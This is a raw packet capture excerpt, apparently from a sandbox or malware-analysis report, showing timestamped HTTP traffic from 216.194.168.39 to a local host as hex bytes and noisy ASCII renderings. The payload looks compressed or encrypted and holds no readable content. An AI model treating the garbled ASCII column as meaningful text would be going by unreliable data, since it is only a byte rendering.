Feb 19, 2015 13:01:59.980154037 MEZ801032216.194.168.39192.168.1.10Data Raw: f3 8d e9 3b 3a 29 f7 b7 22 48 60 54 79 80 ad 80 a8 a3 85 15 d3 6a c5 ac 95 d6 33 cf 33 63 03 cf 3e 03 ac e8 75 14 1e 19 29 a2 85 9d 88 a6 47 5e 79 c0 ad 5a 7c c3 69 71 fc 57 4c a8 77 eb b6 bf cd 3f 0d 1a 29 a9 2c 1b 9f 5e 23 e2 c4 17 ad e4 db f7
Data Ascii: ;:)"H`Tyj33c>u)G^yZ|iqWLw?),^#Yy/!1Z+xiu*sp>@E'~yc<m_)JIMb[5>)T^]aBX_>oz`(G2px<>tP$MtgQd
253
Feb 19, 2015 13:01:59.980299950 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e 0c 36 0f d8 4b b7 17 3e 48 c5 8b a6 6b 3f 23 de 09 a8 7e 9c 44 c1 e1 c2 b5 af 80 da 4e 1b ce fc c6 8c ac 3a fc 3b d5 7d 9d c2 6d 3e 4b 4e 39 77 c0 d4 f4 c7 11 b0 a9 27 16 44 ce 31 63 87 93 3e e2 f3 b0 69 e5 db ff cf 17 20 46 7d 58 58 ed 5b 19
Data Ascii: >6K>Hk?#~DN:;}m>KN9w'D1c>i F}XX[?9ip ->;?5!N c7R_}l>^jv;1vD~,:P'>g_f.`5`s+/~>?Vvf>?/|Y1s;I><!&9FnR\S0
254
Feb 19, 2015 13:01:59.980446100 MEZ801032216.194.168.39192.168.1.10Data Raw: 88 78 32 eb 1a d3 b5 5f 3e 39 8b c2 fd e0 3a cf 15 14 2e 0c 5e 11 2f a9 a7 23 be c7 3e fb 63 d5 85 65 62 64 f1 29 b5 19 3f 06 14 45 fb 32 b0 bb ce da 98 d0 4e f1 2e ac 5e 98 f8 e2 22 7f 0d 83 3e 72 58 81 f1 de 28 9c 0d 32 99 82 20 67 f1 d1 0e 4b
Data Ascii: x2_>9:.^/#>cebd)?E2N.^">rX(2 gKJ'wZP>`:<J<J^K>5}}CH|vV';>E?>09?j,>piHpTQ.;$IJ+Po>N/6$G(
256
Feb 19, 2015 13:01:59.980453968 MEZ801032216.194.168.39192.168.1.10Data Raw: 60 28 b1 ca 9c d3 44 d8 74 c7 4f 8c 34 e9 e6 ec 41 aa b6 80 ad 92 dd 59 5b ac 69 6d 89 f8 b1 70 7d f8 e4 8d 60 86 f6 ac 7d c6 9d 07 5b 11 81 a1 3e c4 8e e3 6e d8 73 e9 c1 9b dc 29 67 e1 7c 61 5c 93 b1 39 5b c6 ed c3 ba b8 05 ac 01 cd b4 83 1f 72
Data Ascii: `(DtO4AY[imp}`}[>ns)g|a\9[ruI*wUh>_r'nu#zJ17^+4w[1@>?"Q}E8WeykBh6/fu>/O_\I<>p;o)f8
258
Feb 19, 2015 13:01:59.980463028 MEZ801032216.194.168.39192.168.1.10Data Raw: 5e fa 75 ae 82 82 5b 5e b5 6d b2 50 f3 4f ef bf ef 7d 67 ac 32 aa 93 b8 25 e6 ec cf 3e 16 81 9b 09 23 f8 59 d5 03 28 22 c8 67 e8 94 e0 50 83 b7 7b 4b 53 03 3b ae b6 5a f3 08 42 20 8b 31 7c eb cb 2a b3 ce 36 c7 bd dc 7d fc 0e ac 68 30 f4 1a 63 36
Data Ascii: ^u[^mPO}g2%>#Y("gP{KS;ZB 1|*6}h0c6qV=A>qi|{*9e[e<*:/(ex"m+[;>Be6lo$4s}dj2HRr)jj)M>LcF3jpoZzy25>t
259
Feb 19, 2015 13:01:59.980683088 MEZ801032216.194.168.39192.168.1.10Data Raw: ce 64 47 6a dd 05 b9 05 4f b1 f6 5e 87 dc b4 81 63 c7 7f 4d 45 64 de ad 62 87 f7 64 ad 41 50 24 8e 0c a8 2c 23 32 44 eb b4 7a b4 9c 69 f1 ef fd 70 b5 b8 ac 1b fb 4f 9b db 03 1a b1 36 17 fc 13 c5 13 8a a8 e4 36 b4 51 5c 1a f7 af f6 76 8e ac b0 00
Data Ascii: dGjO^cMEdbdAP$,#2DzipO66Q\v]>g}2GVe<}n6a>-L-4k*t>lIh<PGG>Cnv73]uMaVrW$r:]M6{wVvM
260
Feb 19, 2015 13:01:59.980690956 MEZ801032216.194.168.39192.168.1.10Data Raw: 0a 77 f6 ac bc da d4 ad 8b 08 c9 11 38 24 ba aa 37 73 e8 9b 25 ed 32 ac 07 55 b5 17 ba 89 3b 36 3e c7 8a fc 5f 41 dc 08 d7 7b f8 32 a2 02 0c b7 20 b2 b5 eb 7f 3b 5a 3a 26 03 15 ac c8 4e 49 96 69 50 8e 92 5e a8 d3 dd 7c 92 4a a8 c7 80 8e ac 97 d4
Data Ascii: w8$7s%2U;6>_A{2 ;Z:&NIiP^|JA$>)~)!"bAo^r B?A({>Lr~*dEu:AOS.C K;IH"Wc&{u=2><8T"UH+
262
Feb 19, 2015 13:01:59.980695009 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e f7 7b c4 8b 92 1c b2 bb a0 94 ff 0f 84 81 f2 a5 fa 4b ac 5c ea 2a 80 21 02 8d 30 3e 08 5d 36 8d c6 e4 60 22 e7 5d cc ba f4 21 da 0a 01 b6 ee 19 bb b0 6c bd cb 20 a4 55 05 3d f7 2e c1 95 7b b4 ee 3f c3 5a eb 79 f8 ce 5d b6 33 53 39 2f 04 e8 06
Data Ascii: >{K\*!0>]6`"]!l U=.{?Zy]3S9/g.r>M(QP<H#KLX1>]h267wG!g)>f%Kv2XU19p>r.Hts:H6|B8r>uLUw5 Ww8=YEFx0>j-
263
Feb 19, 2015 13:01:59.980899096 MEZ801032216.194.168.39192.168.1.10Data Raw: 16 5c d7 55 38 2e b8 a8 37 ee de 21 9f 84 7c ac 5f 7b 29 10 3c 63 ff 05 3e b5 e7 ef 3c 32 9c 68 87 f0 30 03 3a ad 93 b0 4e b3 b7 c1 17 21 8c 85 b3 20 33 ac 57 9c 9e 54 e0 da d4 3b 3e 6c 70 cc 43 1b cb 0a 1a e1 ff be c1 a5 b2 f5 3b 64 4e ec 3e cd
Data Ascii: \U8.7!|_{)<c><2h0:N! 3WT;>lpC;dN>>}$9Wk-\@0yr_u>SYxG<W8x?(yd;FXlgQaQv#74>>}d"lz-~65VX4)b%e;'e>bma#hJmd
263
Feb 19, 2015 13:02:00.032473087 MEZ801032216.194.168.39192.168.1.10Data Raw: ee 35 59 06 a0 de 18 18 b8 7f 5c f1 64 1c 2e 4d 19 ac 75 10 2b a4 be 63 0c 6e 3e 0b a1 87 e3 ed 77 ee 30 6d 3b 6c 2a 35 af 75 7e cb b8 48 cb 09 ef 68 46 fc fc 9c c5 d2 40 49 51 76 d1 a9 5b bb b8 6e b2 4e fa 04 51 21 9b ac a4 1b d8 fd 6b 0d d1 94
Data Ascii: 5Y\d.Mu+cn>w0m;l*5u~HhF@IQv[nNQ!k>2QLGxt)(>99#^cb>C>P*ep{-%;>uSs|3PIJ`&[s8GJx1e{>{Ak,h8$#
265
Feb 19, 2015 13:02:00.032485008 MEZ801032216.194.168.39192.168.1.10Data Raw: 36 c7 37 70 c6 d3 dd d3 8c ca 78 5d e8 c4 6a 77 b9 64 71 65 f0 a1 a9 5c ad ad 25 c0 22 bd cf 2b 79 e9 3f da e6 2b 55 ca c7 c2 22 2a b9 21 7f f5 eb 14 7f d8 ec ac 31 3c 5e f0 7f a1 fa dc 1e 71 11 50 9e cc e2 bc c5 ef b9 50 6d 49 f9 49 7a d8 c9 ac
Data Ascii: 67px]jwdqe\%"+y?+U"*!1<^qPPmIIz{qCf>f{BbU5V<#q_>B@ec>Ps)}>e?Nu<C=mz>:|;Rn;5W_Z>YEj^g9!~~N/z<Go!!
266
Feb 19, 2015 13:02:00.032645941 MEZ801032216.194.168.39192.168.1.10Data Raw: 96 ef 7f f4 29 af 59 0f bb a9 0b 11 40 de 83 6d 94 ac c4 89 dc 32 a2 27 fb 30 3d ea be 05 3b e5 0e ed eb f7 d2 ac 26 0e e9 d4 65 c3 2f b1 3e 09 f4 4b 75 8d d2 1f 5b 4c 76 b2 1c 2d b9 8f fc 38 bb d4 92 ee fc ad 8e ab 38 af 01 55 82 a8 5d 14 82 9f
Data Ascii: )Y@m2'0=;&e/>Ku[Lv-88U]"X.BjL5-&JgQZ6,\S^]&YEp&+,2>#dxTfA(mA3Mk;qT/e?, -X,]!R>D~pXAAr>;J[y+]#}*
268
Feb 19, 2015 13:02:00.036029100 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c 1c d3 81 1b 63 a0 4a 42 72 4d 28 2b 7d c4 14 9c 53 eb 27 ca 24 25 2d 8c c2 3e 6f f3 bf 6c 7d 83 55 80 51 cf 4b 40 fe ca ca f7 22 bc 32 96 87 fd f1 b3 69 fd ac 7d 4c b9 d2 58 1d 32 9a 3e 47 38 1b 23 18 ed 4f 23 5a c9 55 cb ef 91 c3 5a ff bc 6e
Data Ascii: cJBrM(+}S'$%->ol}UQK@"2i}LX2>G8#O#ZUZnuJyBbZ6YE%Sj`2=n>R,S/j@~w.Ytef3qW'Yjrfd[!st>>!rZ3`E.y>>r{bW_G)
269
Feb 19, 2015 13:02:00.036039114 MEZ801032216.194.168.39192.168.1.10Data Raw: 4a 89 d0 4d eb 9c 63 01 15 2d a1 bc 24 a8 2b 6c bd 97 05 f8 0a 22 82 06 1b ac 00 b0 0f 07 d7 5b e2 3a 3e e8 eb 19 c8 69 79 1e 8a c0 cf ef 5c 03 0f 0f 7e 13 bd 26 2c fb 63 28 eb bd e1 6c 4c da 74 cd 3d 82 62 a8 e7 c3 bd 7a 9d 9c dd cf 1c 44 f5 ac
Data Ascii: JMc-$+l"[:>iy\~&,c(lLt=bzD'u>t8J/D!GaXxN_>vTv~A);pV>"Gz}1QWO>5}k%+t>1<nl),pttW$0FP>Bc
271
Feb 19, 2015 13:02:00.036042929 MEZ801032216.194.168.39192.168.1.10Data Raw: 66 6b 88 e1 14 ac e2 69 da f6 47 b8 af aa 3e a7 7b d8 a9 3f f2 8d 72 28 de 74 61 71 73 36 f9 b5 bf 5b 82 b9 c2 9f 59 07 d6 ac 30 2f 40 86 f5 1d 99 b0 3e 7d f7 ad 7f 71 9b ad 7f 31 be ed 1a 46 9b 88 3f 17 bb ad 4a 34 a9 d8 5e 11 fe d8 3f 35 0d bc
Data Ascii: fkiG>{?r(taqs6[Y0/@>}q1F?J4^?5i'|AKwk>4E|J?bQU%%qM>'pF[X|%\N}7> _G[:8c`f>5fVc]%e-Zp8a}.aE
271
Feb 19, 2015 13:02:00.036432028 MEZ801032216.194.168.39192.168.1.10Data Raw: 75 72 72 20 87 fe db ec 4d f1 39 dc 32 3b 64 ba a1 b4 83 92 a8 a1 77 7e 77 3c bf f3 e2 4f 25 a1 ee 07 51 ac a5 37 92 8e e8 a2 d0 7b 3e db a7 28 bf f6 80 44 03 bd fe c5 91 cf 5d be 87 58 bf ed 72 05 88 d7 33 49 76 ac 47 c2 56 f4 cb a0 f9 51 3a 8d
Data Ascii: urr M92;dw~w<O%Q7{>(D]Xr3IvGVQ:(Ky%BPKY>D*2G qd>:*PTT:7&`gL>S"6`lJ3y|g>KAT%LhfbfB&
273
Feb 19, 2015 13:02:00.036437988 MEZ801032216.194.168.39192.168.1.10Data Raw: 01 9b 11 3c 14 1e 22 0d bf ed 7c c2 b9 56 c1 0c 51 d8 45 f7 5a 62 0a ac 5b 02 cd b1 25 eb 7e 72 3e b4 8a a8 a0 d4 a5 c7 26 27 ea b5 cf 2b 19 fc 81 51 c1 3f 5a 0b cc 1d 23 6b 1c 6c f9 bb e3 f5 7f 1f 1e a9 e7 2b c1 10 ef 0f 31 56 a4 26 cb ac 76 48
Data Ascii: <"|VQEZb[%~r>&'+Q?Z#kl+1V&vH[1<>RW+1-N%=L7><c:r~dE00lctB6t'N >S]H2%wJWWxtrULR><.Q">'1kQ5<HGQx2
274
Feb 19, 2015 13:02:00.036586046 MEZ801032216.194.168.39192.168.1.10Data Raw: e9 ce b0 f2 05 98 83 84 1e 40 06 89 a6 64 99 be 50 81 c2 2d 72 b3 0d 3a fe 90 49 ac 4f 27 4a 7f 6d 1d dd 8d 3e bf f6 c9 ad 12 44 49 42 95 a2 fc 1e c3 c8 78 67 f7 c2 de 52 11 97 42 c8 75 b9 ac ff 16 22 ef 71 91 33 c8 36 0c ed 78 a5 89 51 73 c0 7b
Data Ascii: @dP-r:IO'Jm>DIBxgRBu"q36xQs{`pCRCBK>%n-Mv ZO>(H-U~S:ds\%$>t#E&/ f-X%Y#Rl&60v>j
275
Feb 19, 2015 13:02:00.043682098 MEZ801032216.194.168.39192.168.1.10Data Raw: 3a 0d c7 22 a6 0b 41 37 3e 2a ca 6d 56 d4 dd 9d bb 98 bc 09 6d be 46 c5 9a a9 c3 fc 5a 8e 90 8a ed 1d a2 ac a2 e2 5a 6e 0d 95 0f af 3e de a2 29 a0 64 3a 43 af a1 ee 34 a4 39 ed 27 9d 97 c3 c6 58 44 11 40 1a af 95 ac 09 de 93 f2 a9 97 13 2c 26 78
Data Ascii: :"A7>*mVmFZZn>)d:C49'XD@,&x1aZ&.>ATHnwq$AzD$e>5z]!aUd@Zun2[>R!S_[RJ2Q#~>:
276
Feb 19, 2015 13:02:00.055450916 MEZ801032216.194.168.39192.168.1.10Data Raw: 15 ac e8 93 c9 fc 97 e7 a6 fd 3e 19 a4 c7 41 44 69 2c 45 75 c0 c0 73 57 b9 93 38 2e c2 ab 3e f3 dc 80 42 c4 c8 00 e7 1a 88 b8 f7 a4 ad 0b 89 c3 c4 30 e3 77 62 19 d5 47 9b ac f7 d0 e8 11 11 3c 83 ae 3e 79 89 d9 78 63 69 4d b3 23 a4 7d fe d2 cb 3e
Data Ascii: >ADi,EusW8.>B0wbG<>yxciM#}>Aa^|H$U{j"CNkg8e">c1Z@,qqAmA>Dg<`C:D>/?Q7|~9@>`(7>VB;aH.7:)
277
Feb 19, 2015 13:02:00.055464983 MEZ801032216.194.168.39192.168.1.10Data Raw: c5 6b 06 16 33 5f 03 60 15 ac ab a7 c8 d5 a5 d8 d2 c1 be bc 5e ae 19 40 f2 db a5 a3 c5 54 56 ea 31 df 27 c8 e9 ac 7f d2 2a 9e b6 42 ab cc 3e 1f 1c 5b 4f 57 95 ee ed 8b d8 72 50 5d 83 bb 1b 81 c5 29 33 16 8f 55 00 92 e7 ae e3 0b d4 e3 42 45 02 fa
Data Ascii: k3_`^@TV1'*B>[OWrP])3UBEP]*([qIg6b^`,axKz~<0et`HKR>n66<}y^zZ>>(TXgj1yBfz]>=j%
279
Feb 19, 2015 13:02:00.055659056 MEZ801032216.194.168.39192.168.1.10Data Raw: 6d 34 6b 1d c6 0f 08 90 95 e0 65 a6 84 a0 ff ea 39 a8 c7 eb aa 80 18 41 c6 e4 3f 30 4e 93 ed 6b 11 ac 3b c6 cb 77 7f 63 8f 82 3e 4f 5d 3b 4a 2a 69 c9 33 f7 a7 c0 ca 7d ba ec bd 5e 46 c3 c8 ae b3 1f ed 64 49 a8 3f 75 c2 67 9d f7 5c 14 07 23 c6 d7
Data Ascii: m4ke9A?0Nk;wc>O];J*i3}^FdI?ug\#qdvL>>byi#i?|Fk`U A>hU;5>eA2P7jIS1h*cJ>vn&!>r8!H^)yt^_d{de
280
Feb 19, 2015 13:02:00.134943008 MEZ801032216.194.168.39192.168.1.10Data Raw: c7 6b 90 2b 06 18 61 05 12 ac 90 92 f8 5a 08 b8 fc db 26 ba 86 14 31 97 8d a8 40 2d ce ac b2 40 5a 57 8d cb 72 19 3e 57 ce c0 35 71 39 98 ca 00 04 c3 7f 7d 16 d9 ec fa c8 5d b5 0e c3 0d fb 4a 67 ac fc a8 b9 8d 67 90 da 53 3e ad fc 37 df 6e 72 c4
Data Ascii: k+aZ&1@-@ZWr>W5q9}]JggS>7nrsK2:o*w<G6,88Svpxt2>11{l@>52 W!KIf0^>y[R=&>?h*(Xl//S<
281
Feb 19, 2015 13:02:00.137120008 MEZ801032216.194.168.39192.168.1.10Data Raw: 37 e6 15 ac 5c a7 ac 05 7f a3 24 fa 3e ce 54 1d af 93 a8 fe 4a 76 e0 20 20 65 f5 93 24 67 c8 8c 7e 5c 00 64 54 22 99 ac d3 7a 29 16 fd e6 2c 3f 3e 94 dd 93 9c b9 99 86 b0 77 fd bf d6 1b de 31 3c be b9 ac 8a 3d 5f 4a ff f1 b6 a2 3e 27 e0 c5 be 81
Data Ascii: 7\$>TJv e$g~\dT"z),?>w1<=_J>'d!V)a1>KZ220>)X#1)Qe1sL7e; >CF3aW:Ad?&>S5D$DUL"=>n;
282
Feb 19, 2015 13:02:00.137140989 MEZ801032216.194.168.39192.168.1.10Data Raw: f8 40 f2 98 a4 c1 c9 f8 27 d0 f7 5e 4d 48 b5 ac 7d 17 49 1c f0 e5 0d 87 3e 88 9c 68 fb 69 c7 d3 73 e6 c4 7d 97 e4 88 5d 62 05 c9 83 25 ee a5 89 82 8a 77 b4 2e bb 24 53 3a 15 cd 25 58 bd c9 14 02 f2 a9 e1 47 39 93 ac d8 ba 8e 80 8f d3 b8 7a 3e a6
Data Ascii: @'^MH}I>his}]b%w.$S:%XG9z>6oatBx|+y!>MWV3;g{n>w*uj5%L-^Yz>c\+D'OnObfisHHiua+>p6n
284
Feb 19, 2015 13:02:00.137268066 MEZ801032216.194.168.39192.168.1.10Data Raw: 1e 51 f7 e0 26 61 d0 f7 1c b6 cb ca 17 8c b0 9a 6d 3f 87 ac 7e 2f 24 bd 21 7c a3 26 3e 5b d1 d2 02 8a 59 5f 29 54 cb cc 7e 7b 16 3e 20 17 cb db 16 d0 e2 a8 7a a5 54 ac 6b ec de ee 2e 1e c3 c6 3e d0 b3 72 0b 13 9a 50 b4 5d 49 a0 10 51 5c c7 12 8f
Data Ascii: Q&am?~/$!|&>[Y_)T~{> zTk.>rP]IQ\L%P-h|^>#yIEd1B=q\T&'y>[8m'k3aA?\/OG)O@$sv\tad>as-q]7>2>X7;Je>
284
Feb 19, 2015 13:02:00.141401052 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c 8c fe a9 35 84 9f c1 df 8b 4a db 8d 59 57 20 bd 9a d6 08 cb e0 80 2e d0 96 6f 3d 81 ac 79 83 f3 8a 7e 01 c9 36 3e a3 24 d6 7f ea b8 7c 8d e0 f7 71 05 ed ea 92 0c c5 20 ac ad 8a 37 e9 23 a8 cb 7c 3e 56 9f c9 72 7b 03 eb 41 fb ad 34 71 60 10 aa
Data Ascii: 5JYW .o=y~6>$|q 7#|>Vr{A4q`|Q QN9n>!*_Ogz9:s&Rr^!F>!xn_}!Xw6*[8IOPY2P0Q>dP`bM77}>VZp+_Y
286
Feb 19, 2015 13:02:00.141419888 MEZ801032216.194.168.39192.168.1.10Data Raw: 52 55 83 2e f3 54 26 86 8c 18 21 4d d4 a9 ee 25 82 ac f7 57 c7 68 66 f0 db cc 3e 09 81 cd 2a 85 1e dd 57 4e 78 19 bb 06 75 49 24 49 cd a1 a2 5c c6 a5 ae 68 81 ac c0 be 25 da 4e ea 41 c5 5e 33 9c db 82 18 12 a8 e7 53 8d ac e9 33 e0 6e f4 ce d6 19
Data Ascii: RU.T&!M%Whf>*WNxuI$I\h%NA^3S3n>Q\)GK}-Q'>3Xoums4l>jY58cUik(\HDd1>:Ps7T.wRyTGG;^xN0qT'>*XA!
287
Feb 19, 2015 13:02:00.141422987 MEZ801032216.194.168.39192.168.1.10Data Raw: ce 7e 8c 13 a9 41 56 ce b9 ac de d1 29 e4 22 f7 8c 41 3e 4b 6b 76 ee ae 27 d4 76 b8 95 bb 8b 64 62 c5 9e d6 3d ac f3 da 9a c0 29 ae ae a6 3e 08 fd 12 25 8c 33 41 b9 c4 86 42 a5 cc 23 cd 7e b1 0c ac 6f cf 9d ce 48 be dd b0 3e d6 9e 0c 18 91 a5 76
Data Ascii: ~AV)"A>Kkv'vdb=)>%3AB#~oH>vvW@2wv;fl^v~M?-G76>@AY:GKGv>H3-e2J%W>o?RZ`>="9hXZ!;@F{=b~k
288
Feb 19, 2015 13:02:00.141774893 MEZ801032216.194.168.39192.168.1.10Data Raw: 4a 01 cf ae 6b bd cf cd 2e 22 5e ac 59 25 c1 51 5c 17 56 00 3e 7d 6b 1d 8f 72 3b c8 00 47 ac 11 f3 43 a8 b2 7f ed ce b7 35 04 9b 3b d4 1e 18 f2 3e 08 f7 ce 23 05 18 31 23 4e ee bb d6 8c b6 51 ad c7 cf c0 7f 53 4e e3 81 56 5c ac 52 fc 69 89 d8 0b
Data Ascii: Jk."^Y%Q\V>}kr;GC5;>#1#NQSNV\Ri>"W!]ElNP(]u:w2!"djA^>)xGgp'PlxOrxX>gnBUtcxLc;U`j>eli)wJ6N-jq>X
289
Feb 19, 2015 13:02:00.141782045 MEZ801032216.194.168.39192.168.1.10Data Raw: 70 88 00 d5 2c 34 a3 e2 3e e3 35 8a 1b 07 e0 b3 95 71 5c 6a 7d db f2 77 b1 d9 ea a8 3e 4b 2d 62 70 9c bf ad 6a b6 d8 30 3d 91 bd 2f 51 45 d0 5e e3 b7 28 11 ca fb 5b ac b2 c6 c0 04 cc da 02 72 3e 34 c5 e5 69 5f 66 b1 f1 bf a1 31 37 4e b9 ed 8c 79
Data Ascii: p,4>5q\j}w>K-bpj0=/QE^([r>4i_f17NyV;Hp[%T^^3H|CY1>9R<cJtZeV1j+^>~(=8AjWmp`Hu^'W'>vbom$ >E&p?
291
Feb 19, 2015 13:02:00.141902924 MEZ801032216.194.168.39192.168.1.10Data Raw: cf 30 52 da a0 7a 38 cb bc 3a 69 a0 3e 45 2a c5 4d 7e eb f4 4a 1f ae 99 65 8f 6d c9 50 18 d2 3e 04 8c 9f c9 36 08 7f ac 5d b1 a1 a3 6f 46 24 dc be 1a dc 3b bc 2f 54 e8 a5 20 d2 e7 2f 87 26 30 e2 ba fc ac 2c ee de 7a 5e 6d 96 7f 3e 4c 61 4c 7e c7
Data Ascii: 0Rz8:i>E*M~JemP>6]oF$;/T /&0,z^m>LaL~D?;~YO i8`>n6lTQ(T{hz243=\"i]@A`rM>FH1|,~xMQ"MOzMB64xj>W>)V
292
Feb 19, 2015 13:02:00.146601915 MEZ801032216.194.168.39192.168.1.10Data Raw: 22 95 87 ff 3e f0 ad 71 1a a1 0b 90 cd 27 dc 9c 56 ea 4e da f7 59 d3 1a 23 15 4d 77 a1 06 ef ac 60 3c 77 6c 39 90 e1 f9 3d 51 d7 d5 3a b4 a4 74 87 af 5c ac c3 fa a6 22 66 56 99 d0 3e 1c 43 d8 dd 78 1c ca 60 35 03 7d 91 5b 21 c9 9d be d3 46 39 2e
Data Ascii: ">q'VNY#Mw`<wl9=Q:t\"fV>Cx`5}[!F9.H_MNs0=!}h|=!62>CA`|3:}vS9:0J(g89^L>-|Q),L)%I_>1fZyO.8TFZ3"_`
293
Feb 19, 2015 13:02:00.967787027 MEZ801032216.194.168.39192.168.1.10Data Raw: cf eb 31 a4 da a9 01 2c d3 b2 bb 68 e8 58 a3 ce 49 ac b0 2d 56 97 01 f5 51 a3 3e e5 e0 89 50 4c 4c cc 7f a9 ba 38 f4 8e 49 2f 0f 9d d3 81 a8 07 b4 96 86 71 9e aa 2f 21 d7 25 3a ed b4 7b 01 d5 d3 11 23 b3 ec f1 e5 ae bf ac 89 a9 85 18 fa eb 34 a1
Data Ascii: 1,hXI-VQ>PLL8I/q/!%:{#4>?1 PyaH<Qb%bjsE|,]tHHn">z^>.^ojSsqFw>]g<OS;)>n1>"!w52.JWN:B:
294
Feb 19, 2015 13:02:00.967808962 MEZ801032216.194.168.39192.168.1.10Data Raw: 93 7c 12 0e a1 44 2f a7 ec 6c 6e 87 d5 4e a8 78 4a ca b5 58 26 bc ce 65 4b b1 05 1e 0a 6c 73 15 95 50 39 e6 5c 3d d2 e9 d5 53 ae 89 5a 4a 16 c6 9b ac 17 62 3c cc ba d3 d7 bc 7e 7e 5e c2 4b cc 6b 77 39 38 d5 37 2c 4f 09 c9 75 82 e1 ac 5e 60 a9 31
Data Ascii: |D/lnNxJX&eKlsP9\=SZJb<~~^Kkw987,Ou^`1Ws>!_\m%({SUA[4>5zqq.vdjCA@p,=05f}!7Y^zjnXPX(>qRZZa10o)H<b#>^$)E;,4'?
296
Feb 19, 2015 13:02:00.967811108 MEZ801032216.194.168.39192.168.1.10Data Raw: 92 55 6f 38 d6 b7 7b 8e 37 ea 72 55 9b ac d9 20 fe 5e b4 4a ca c3 fe 2a f4 8d e0 b3 8d e3 3a cb d2 ac 58 c0 d2 35 7e c9 50 26 3e 78 10 83 88 ff 4b 66 ab 87 97 40 57 cc 4b 53 3a da d6 b1 e9 c5 5d c8 42 73 07 a0 55 b5 29 af c7 8e 8a a3 6a e5 d6 81
Data Ascii: Uo8{7rU ^J*:X5~P&>xKf@WKS:]BsU)j58A>|kiZiUx778H>]06;>ud\d|+Ln>bo5.|K;n-28>~Ha1%
297
Feb 19, 2015 13:02:00.967932940 MEZ801032216.194.168.39192.168.1.10Data Raw: 9b ac 50 9a 9b ac a4 8a be 74 3e 95 b6 e4 90 fc 57 63 c2 89 66 5a 53 44 6b 9e 7f 12 d7 55 69 79 c2 68 0a 80 dc ac 61 15 b5 43 85 9c bd b8 1e 9d 47 6d 1a 38 0c b9 55 a5 d7 a9 1b 20 ca ea 74 b6 b8 ac d6 a2 b6 a2 c7 13 f5 e1 3e f5 2d 5c 4f 5d e5 81
Data Ascii: Pt>WcfZSDkUiyhaCGm8U t>-\O]Of}:+P!9Pkh6pA`7n|#x_>$hw.&pz>_J{!].C WNHccR_K"-Q>ES<Gi7,hv\"jA'.g
298
Feb 19, 2015 13:02:00.967936993 MEZ801032216.194.168.39192.168.1.10Data Raw: 71 ef 59 39 d8 af 70 1b c0 f5 68 f0 35 ac 3c d2 4c ca 6c bb 4f df 3e 9b bc bc 52 6c 1f db a9 f9 91 c9 83 6b fb f1 2c 73 d8 f9 56 75 d0 23 22 b6 b6 ac 0c 69 6e 64 23 bc ed 44 3e de 0b 0e 9f 4b be cd ab 62 f3 84 4d a1 05 43 3b 9e fb d6 3e 5a fc ae
Data Ascii: qY9ph5<LlO>Rlk,sVu#"ind#D>KbMC;>Z|\XQNSMf$b>{c%SQ;P~"PQ{{wi(e;U*o->;> dL)ZLO!r6dA3:S ?&zMi9y<A/=g
300
Feb 19, 2015 13:02:00.968151093 MEZ801032216.194.168.39192.168.1.10Data Raw: f5 46 7e 45 9a 71 d5 30 9e b7 21 f8 da 1a cb 71 c7 1b 30 62 bc ac a3 63 a5 57 1f 78 46 88 3e 71 fc f6 d3 1f f5 93 89 68 8f 90 dc ff 4e 97 0a 22 da 31 6e 1d fb df c6 2e 51 ec c4 df 2c ab 5c db c1 8a e1 6f ed 9c e3 13 52 c4 c9 18 da ed 03 e7 98 dd
Data Ascii: F~Eq0!q0bcWxF>qhN"1n.Q,\oR]FPo>)x!jx;E9>D:QEq|[*xX'>}0=,x!@~7-Sy>MsuFQc3?ML3s%G<{
301
Feb 19, 2015 13:02:00.968172073 MEZ801032216.194.168.39192.168.1.10Data Raw: 5e 4c a9 bc db b1 5b 52 fd 09 77 86 4a ac 47 8a 94 8f 9d 71 3d 1d 3e af c5 b0 91 ff 85 89 b7 74 8a e5 85 78 fd 16 b2 74 92 ac f1 c1 29 e3 55 7f 77 e0 3e 56 f2 48 c2 75 8f 4e 7f 77 4d 1b ca 07 88 cb 20 40 db ab a1 3e 33 ea bb 3a b4 ac c2 00 95 47
Data Ascii: ^L[RwJGq=>txt)Uw>VHuNwM @>3:G#>O9hpK[A_yM"~U9Tq>X2f,d[G?J"Nn[[='v4kL&wA$,%J&>_^tP`+;M^7
302
Feb 19, 2015 13:02:00.968175888 MEZ801032216.194.168.39192.168.1.10Data Raw: fa 65 fe 00 3f ac 5e 27 37 b3 3a c2 d8 ac 6a b9 cc 1d 60 97 4c db 3e c0 d2 5b a9 43 99 2c bb dd 90 6e 2b de 8d 06 d9 bd dc 7e 94 39 37 5d 72 86 36 9c 49 11 ec c8 11 2c 97 a4 64 f7 dc 09 c4 20 ec f4 2a f3 e3 ac 5c eb 1f ed a8 35 03 37 3e bd f0 66
Data Ascii: e?^'7:j`L>[C,n+~97]r6I,d *\57>fvkY@P^4I: \=NBJSH>%.q-!KE/N|>)T9?"]#?|>}~l2taF{9>
304
Feb 19, 2015 13:02:00.968179941 MEZ801032216.194.168.39192.168.1.10Data Raw: de 49 ec d9 0b 48 31 16 c8 ac 1a 4d dd 47 18 6c 15 0a 3e 86 94 87 06 c2 e1 d1 01 4b 9c 37 36 08 a2 8d 99 5c b3 ac 0b 52 eb 7e 99 4c 10 37 3e df c4 b5 bf db a9 ef 01 50 f7 c2 a9 d3 46 6f 7d 70 de 2c a6 01 ff ce f6 17 01 ac 76 db d1 94 c2 67 d3 37
Data Ascii: IH1MGl>K76\R~L7>PFo}p,vg7>=]JTYFd#y{D>JuN1`{Hult"<PD>!7C0i+|Gg{^>\-pM]dtg><dOy+W5GM|@v^)U
305
Feb 19, 2015 13:02:00.968182087 MEZ801032216.194.168.39192.168.1.10Data Raw: 57 67 3e 90 3c dc ac e9 53 77 7f b2 dc 05 75 51 e8 e3 86 a0 df 80 30 10 b8 95 99 9d 12 ac fe 45 dc 93 9a 1d 8b ed 3e dc 1d 37 5e fb 78 a0 12 bd 37 c3 38 d5 d9 5c f3 f0 3b e3 3e 43 ab 59 52 56 c2 05 57 c0 fa a9 49 9c 10 89 95 24 bf 9e 1e 96 54 9e
Data Ascii: Wg><SwuQ0E>7^x78\;>CYRVWI$TA60@<k>3&>,+J980`.;!%`}O3"Z>Gg>eZp*Ul"Y!V$:B}-=7
307
